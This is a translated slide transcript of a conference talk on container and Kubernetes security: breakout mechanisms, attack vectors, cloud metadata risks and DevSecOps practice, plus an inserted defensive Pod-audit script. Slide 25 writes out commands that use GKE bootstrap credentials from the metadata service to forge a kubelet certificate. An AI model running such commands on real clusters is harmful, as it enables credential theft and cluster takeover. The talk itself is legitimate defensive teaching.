Security of infrastructure platform technologies and what comes next

mrtc0
September 25, 2020


Presentation material for InfraStudy #6 (https://forkwell.connpass.com/event/187694/).
The terminal images are GIFs, so please see the links inside the slides or https://gist.github.com/mrtc0/16f169e679674e43dfbb33ae5b0c4d5e. The video is at https://www.youtube.com/watch?v=X8HvH3dF6ZM.


Transcript

  1. Security of infrastructure platform technologies and what comes next. Kohei Morita (GMO Pepabo, Inc.), InfraStudy #6: infrastructure, security, and what comes next.

  2. Kohei Morita (@mrtc0): Senior Engineer, Security Office, GMO Pepabo; Security Camp lecturer; Security Camp steering committee member; IPA MITOU creator. https://blog.ssrf.in

  3. What this talk covers
     - Security of containers, Kubernetes and the like
     - How to approach security going forward
     The slot is surprisingly short, so not everything I want to say will fit; let's continue the discussion in the Q&A and at the social afterwards.

  4. Container Security

  5. "How containers are built and how they are broken": https://speakerdeck.com/mrtc0/container-structure-and-exploitation-method

  6. How Linux containers work
     - For details, see the earlier InfraStudy session on the topic
     - Linux security mechanisms are used to isolate privileges and resources
     - Namespace, cgroup, Capability, seccomp, LSM, etc.
     - If the container's privilege isolation is deficient, root on the host may be obtained
  7. Main attack scenarios against Linux containers
     - Vulnerabilities in container images
     - Vulnerabilities and misconfigurations in the container runtime
     - Vulnerabilities in the Linux kernel

  8. Yardsticks for container security
     - Read the guidelines published by the community and by standards bodies
     - CIS Benchmarks: Securing Docker
     - NIST SP 800-190: Application Container Security Guide
     - Frankly, some items make you think "really, that far?", so work out what the threats to your own company are and apply the measures accordingly

  9. Sensitive File Mount
     - There are many files that must not be readable or writable from a container
     - /proc/kcore, /proc/sysrq-trigger
     - Mount them read-only, or do not mount them at all
     - Mounting /var/run/docker.sock is also off limits

  10. Capability and seccomp
     - CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_READ_SEARCH and so on
     - Privileged containers are extremely dangerous
     - Calling mount to mount /dev/sda, /dev/vda and similar devices
     - Breakout using cgroup notify_on_release

  11. call_usermodehelper_exec
     - Executes a program in the manner of a callback
     - release_agent, binfmt_misc, core_pattern, uevent_helper, etc.
     - This mechanism can be used to escape to the host side

  12. Breakout with uevent_helper (asciinema recording; see the gist linked above)

  13. Breakout with cgroup release_agent (asciinema recording)

  14. seccomp bypass
     - On older Linux kernels it could be bypassed using ptrace() (asciinema recording)

  15. Defense In Depth
     - Linux containers are built from layers of defense
     - Even if one mechanism is breached, another one prevents or mitigates the attack
     - e.g. even if seccomp is bypassed, capabilities block the next step
     - This concept is needed in every area of security
  16. Kubernetes Security

  17. Kubernetes Security
     - RBAC configuration, including ServiceAccounts
     - Use of trusted container images
     - NetworkPolicy
     - Service Mesh
     - Capability and resource settings for Pods and containers
     - Secret management
     - Audit Log
     - Protecting kube-apiserver and kubelet
     - Access control for the Dashboard and similar UIs
     - Vulnerabilities in Kubernetes itself, the container runtime and the kernel
     - Secure communication between components
     - Protecting the Metadata Service
     - Admission Controller plugins
     - etcd encryption
     - and so on

  18. Kubernetes Security
     - Kubernetes has many complex components, so use the threat models that have already been published to decide what to protect
     - A CNCF user group has run an exercise using STRIDE
     - CIS Benchmarks also exist for Kubernetes, EKS, GKE and AKS, so refer to those as well
     https://github.com/cncf/financial-user-group/tree/master/projects/k8s-threat-model

  19. Microsoft Security blog: "Attack matrix for Kubernetes"

  20. Attack vectors
     - ServiceAccount Token: the ServiceAccount token mounted into Pods is abused. Do not mount it automatically; configure RBAC properly.
     - Unauthorized API: do not leave the API callable by anyone without authentication. Do not set anonymous-auth=true on kube-apiserver.
     - PodSecurityPolicy / Gatekeeper: countermeasures against mounting or tampering with host files. Configure allowedHostPaths, readOnlyRootFilesystem and Capabilities.
     - etcd encryption and access control: etcd contains sensitive information, so apply access control and encryption.
     - Network: access to other Pods and to the metadata service. Control it with NetworkPolicy or a Service Mesh.
     - Secret management: Secrets end up committed as-is to VCS. Encrypt them, or manage them in Vault or a KMS.
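A defender-side check that ties the Sensitive File Mount, Capability and attack-vector slides together, as an added example that is not from the talk or its gist: it audits a Pod manifest for the weak settings listed there. The sensitive-path list, the capability set and the sample Pod are assumptions chosen for illustration.

```python
# Added example (not from the talk): audit a Kubernetes Pod spec (dict parsed from
# YAML/JSON) against the talk's checklist: sensitive hostPath mounts, escape-enabling
# capabilities, privileged mode, auto-mounted SA token, writable root filesystem.
# SENSITIVE_HOST_PATHS, DANGEROUS_CAPS and the sample Pod are constructed here.
SENSITIVE_HOST_PATHS = ("/", "/proc", "/dev", "/var/run/docker.sock", "/run/docker.sock")
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "DAC_READ_SEARCH", "ALL"}

def _under(path, prefix):
    """True if path is prefix itself or lies below it ("/" matches only itself)."""
    return path == prefix or (prefix != "/" and path.startswith(prefix + "/"))

def audit_pod(pod):
    """Return a list of findings (strings) for one Pod manifest; empty means clean."""
    findings = []
    spec = pod.get("spec", {})
    if spec.get("automountServiceAccountToken", True):  # slide 20: do not auto-mount
        findings.append("ServiceAccount token auto-mounted; set automountServiceAccountToken: false")
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name, sc = c["name"], c.get("securityContext", {})
        if sc.get("privileged"):  # slide 10: privileged containers are very dangerous
            findings.append(f"{name}: privileged container")
        if not sc.get("readOnlyRootFilesystem"):  # slide 20: PSP/Gatekeeper setting
            findings.append(f"{name}: readOnlyRootFilesystem not set")
        added = {x.upper().replace("CAP_", "", 1) for x in sc.get("capabilities", {}).get("add", [])}
        for cap in sorted(added & DANGEROUS_CAPS):  # slide 10: SYS_ADMIN, SYS_PTRACE, ...
            findings.append(f"{name}: adds CAP_{cap}")
        for m in c.get("volumeMounts", []):  # slide 9: sensitive file mounts
            path = host_paths.get(m["name"])
            if path and any(_under(path, p) for p in SENSITIVE_HOST_PATHS):
                mode = "read-only" if m.get("readOnly") else "read-write"
                findings.append(f"{name}: mounts sensitive hostPath {path} {mode}")
    return findings

# Constructed sample: a "debug" Pod carrying the weak settings the talk warns about
SAMPLE_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "debug"}, "spec": {
    "volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}},
                {"name": "logs", "hostPath": {"path": "/var/log"}}],
    "containers": [{"name": "app", "image": "example/app:1.0",
                    "securityContext": {"capabilities": {"add": ["SYS_ADMIN", "NET_BIND_SERVICE"]}},
                    "volumeMounts": [{"name": "sock", "mountPath": "/var/run/docker.sock"},
                                     {"name": "logs", "mountPath": "/host/log", "readOnly": True}]}]}}

if __name__ == "__main__":
    for finding in audit_pod(SAMPLE_POD):
        print("FINDING:", finding)
```

The same function can be run over every Pod returned by `kubectl get pods -A -o json` to turn the slide's checklist into a recurring audit.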
  21. metadata service
     - An endpoint provided by the cloud provider
     - Reachable over plain HTTP
     - It may hold IAM credentials, Kubernetes environment variables and the like, so it gets used for Privilege Escalation
     - From the application layer it can also be stolen via SSRF and similar bugs

  22. EKS
     - Retrieve instance information
     - Retrieve VPC and Security Group information
     - Pull images from ECR repositories
     https://docs.aws.amazon.com/eks/latest/userguide/restrict-ec2-credential-access.html

  23. GKE
     - The kube-env metadata entry holds the certificates and other material used by the bootstrap process
     - With those credentials a CertificateSigningRequest resource can be created
     - kube-controller-manager approves the CSR automatically, so a kubelet can be impersonated

  24. "Each node in the cluster is injected with a shared Secret at creation, which it can use to submit certificate signing requests to the cluster root CA and obtain kubelet client certificates. These certificates are then used by the kubelet to authenticate its requests to the API server. Note that this shared Secret is reachable by Pods, unless metadata concealment is enabled." https://cloud.google.com/kubernetes-engine/docs/concepts/cluster-trust

  25. impersonate kubelet
     root@test:/# echo $CA_CERT | base64 -d > bootstrap/ca.crt
     root@test:/# echo $KUBELET_CERT | base64 -d > bootstrap/kubelet-bootstrap.crt
     root@test:/# echo $KUBELET_KEY | base64 -d > bootstrap/kubelet-bootstrap.key
     root@test:/# CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')"
     root@test:/# openssl ecparam -genkey -name prime256v1 -out kubelet.key
     root@test:/tmp# openssl req -new -config /tmp/openssl.cnf -key kubelet.key -out kubelet.csr
     root@test:/# cat /tmp/kubelet.yaml
     apiVersion: certificates.k8s.io/v1beta1
     kind: CertificateSigningRequest
     metadata:
       name: node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2
     spec:
       groups:
       - system:authenticated
       request: LS0tLS...
       ...
       username: kubelet
     root@test:/# kubectl create -f /tmp/kubelet.yaml --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key
     root@test:/# kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootst client-key=bootstrap/kubelet-bootstrap.key get csr node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 -o jsonpath='{.status.certificate}' | b /tmp/kubelet.crt
  26. Case studies
     - Shopify: "SSRF in Exchange leads to ROOT access in all instances" (HackerOne report)
     - GitLab: "SSRF into Shared Runner by replacing dockerd with malicious server in Executor" (HackerOne report)
     - Besides dashboards, there have also been attacks targeting Weave Scope and Kubeflow
     - https://www.weave.works/blog/preventing-malicious-use-of-weave-scope
     - Microsoft Security blog: "Misconfigured Kubeflow workloads are a security risk"

  27. How do we approach this going forward?

  28. The shared responsibility model in the cloud
     - How far does the cloud provider protect us, again?
     - What does the user have to protect, again?
     Source: learn.gitlab.com, next-gen software security: steps for CISOs to secure next-gen software

  29. How to approach it
     - Platform technology evolves fast, so by the time security work is requested there is already a gap from the latest version
     - There are no security guidelines, so the security level varies from service to service

  30. DevSecOps
     - First of all, a security culture has to be built
     - Build guidelines and threat models
     - Automation and platform building to abstract away the complexity
     - Co: Communication, Completeness, Continuous
     - TDS: Test Driven Security

  31. Want to work at Pepabo too? Check the latest job openings → @pb_recruit